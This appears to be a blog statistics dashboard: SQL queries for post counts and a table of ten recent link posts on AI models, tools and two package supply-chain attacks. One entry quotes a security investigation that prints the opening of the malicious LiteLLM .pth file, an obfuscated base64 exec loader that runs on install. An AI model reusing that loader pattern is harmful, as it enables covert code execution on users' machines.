Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3288

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8331

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1368

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by count(*) desc

Ten most recent blogmarks (of 8331 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

link_title link_url commentary created
Vulnerability Research Is Cooked https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/ Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research. > Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”. Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force: > You can't design a better problem for an LLM agent than exploitation research. > > Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the `hrtimer` subsystem, `workqueue`, or `perf_event`? The model knows. > > Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox. > > Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to. The article was partly inspired by [this episode of the Security Cryptography Whatever podcast](https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/), where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes. I just started a new tag here for [ai-security-research](https://simonwillison.net/tags/ai-security-research/) - it's up to 11 posts already. 2026-04-03 23:59:08+00:00
Gemma 4: Byte for byte, the most capable open models https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/ Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: > The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total. I don't entirely understand that, but apparently that's what the "E" in E2B means! One particularly exciting feature of these models is that they are multi-modal beyond just images: > **Vision and audio**: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding. I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet. I tried them out using the GGUFs for [LM Studio](https://lmstudio.ai/models/gemma-4). The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out `"---\n"` in a loop for every prompt I tried. The succession of [pelican quality](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb) from 2B to 4B to 26B-A4B is notable: E2B: ![Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican](https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png) E4B: ![Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it](https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png) 26B-A4B: ![Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle](https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png) (This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after [fixing that](https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105) I got probably the best pelican I've seen yet from a model that runs on my laptop.) Google are providing API access to the two larger Gemma models via their [AI Studio](https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it). I added support to [llm-gemini](https://github.com/simonw/llm-gemini) and then [ran a pelican](https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e) through the 31B model using that: llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle' Pretty good, though it is missing the front part of the bicycle frame: ![Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. ](https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png) 2026-04-02 18:28:54+00:00
Announcing 1-bit Bonsai https://prismml.com/news/bonsai-8b PrismML is a newly out-of-stealth AI lab with [a focus](https://prismml.com/about) on researching "can we massively multiply intelligence in models without increasing their size or complexity?". Their first model release is a model called Bonsai, and it's very small indeed: it comes in 1.7B, 4B and 8B parameter sizes but uses 1 bit parameters. Here are the sizes of the resulting models on Hugging Face: <center><table> <thead> <tr> <th>Model</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-mlx-1bit">Bonsai-8B-mlx-1bit</a></td> <td>1.3 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-8B-gguf">Bonsai-8B-gguf</a></td> <td>1.16 GB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-gguf">Bonsai-4B-gguf</a></td> <td>572 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-4B-mlx-1bit">Bonsai-4B-mlx-1bit</a></td> <td>645 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-gguf">Bonsai-1.7B-gguf</a></td> <td>248 MB</td> </tr> <tr> <td><a href="https://huggingface.co/prism-ml/Bonsai-1.7B-mlx-1bit">Bonsai-1.7B-mlx-1bit</a></td> <td>285 MB</td> </tr> </tbody> </table></center> 2026-04-01 20:20:04+00:00
Supply Chain Attack on Axios Pulls Malicious Dependency from npm https://socket.dev/blog/axios-npm-package-compromised Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with [101 million weekly downloads](https://www.npmjs.com/package/axios). Versions `1.14.1` and `0.30.4` both included a new dependency called `plain-crypto-js` which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have [an open issue to adopt trusted publishing](https://github.com/axios/axios/issues/7055), which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM [last week](https://simonwillison.net/2026/Mar/24/malicious-litellm/) as well. 2026-03-31 23:28:40+00:00
Pretext https://github.com/chenglou/pretext Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the [react-motion](https://github.com/chenglou/react-motion) animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text *without touching the DOM*. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications. Here's [one demo](https://chenglou.me/pretext/dynamic-layout/) that shows the kind of things this makes possible: <video autoplay loop muted playsinline poster="https://static.simonwillison.net/static/2026/pretex.jpg"> <source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"> </video> The key to how this works is the way it separates calculations into a call to a `prepare()` function followed by multiple calls to `layout()`. The `prepare()` function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once. The `layout()` function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height. I [had Claude](https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe) build me [this interactive artifact](https://tools.simonwillison.net/pretext-explainer) to help me visually understand what's going on, based on a simplified version of Pretext itself. The way this is tested is particularly impressive. The earlier tests [rendered a full copy of the Great Gatsby](https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2) in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by [the corpora/ folder](https://github.com/chenglou/pretext/tree/main/corpora) using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more. Cheng Lou [says](https://twitter.com/_chenglou/status/2037715226838343871): > The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis > > This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure & iterate against those at every significant container width, running over weeks 2026-03-29 20:08:45+00:00
We Rewrote JSONata with AI in a Day, Saved $500K/Year https://www.reco.ai/blog/we-rewrote-jsonata-with-ai Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. 2026-03-27 00:35:01+00:00
My minute-by-minute response to the LiteLLM malware attack https://futuresearch.ai/blog/litellm-attack-transcript/ Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: > **Confirmed**. Fresh download from PyPI right now in an isolated Docker container: > > Inspecting: litellm-1.82.8-py3-none-any.whl > FOUND: litellm_init.pth > SIZE: 34628 bytes > FIRST 200 CHARS: > import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl... > > The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately. I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation. 2026-03-26 23:58:22+00:00
Quantization from the ground up https://ngrok.com/blog/quantization Sam Rose continues [his streak](https://simonwillison.net/tags/sam-rose/) of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "[the best post I've ever made](https://twitter.com/samwhoo/status/2036845101561835968)".) Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits. ![Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111101100001110100000, and a slider control at the bottom along with minus, plus, and reset buttons.](https://static.simonwillison.net/static/2026/float.jpg) I hadn't heard about **outlier values** in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important: > Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are *very* important to model quality. Removing even a *single* "super weight," as Apple calls them, can cause the model to output complete gibberish. > > Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed. Plus there's a section on [How much does quantization affect model accuracy?](https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy). Sam explains the concepts of **perplexity** and ** KL divergence ** and then uses the [llama.cpp perplexity tool](https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity) and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B. His conclusion: > It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it. 2026-03-26 16:21:09+00:00
Thoughts on slowing the fuck down https://news.ycombinator.com/item?id=47517539 Mario Zechner created the [Pi agent framework](https://github.com/badlogic/pi-mono) used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed: > We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned. Agents and humans both make mistakes, but agent mistakes accumulate much faster: > A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...] > > With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...] > > You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity. I think Mario is exactly right about this. Agents let us move *so much faster*, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours. It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. [Cognitive debt](https://simonwillison.net/tags/cognitive-debt/) is real. Mario recommends slowing down: > Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code. > > Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...] I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed v.s. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software. 2026-03-25 21:47:17+00:00
LiteLLM Hack: Were You One of the 47,000? https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/ Daniel Hnyk used the [BigQuery PyPI dataset](https://console.cloud.google.com/bigquery?p=bigquery-public-data&d=pypi) to determine how many downloads there were of [the exploited LiteLLM packages](https://simonwillison.net/2026/Mar/24/malicious-litellm/) during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8). They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. 2026-03-25 17:21:04+00:00
Copy and export data

Duration: 4.00ms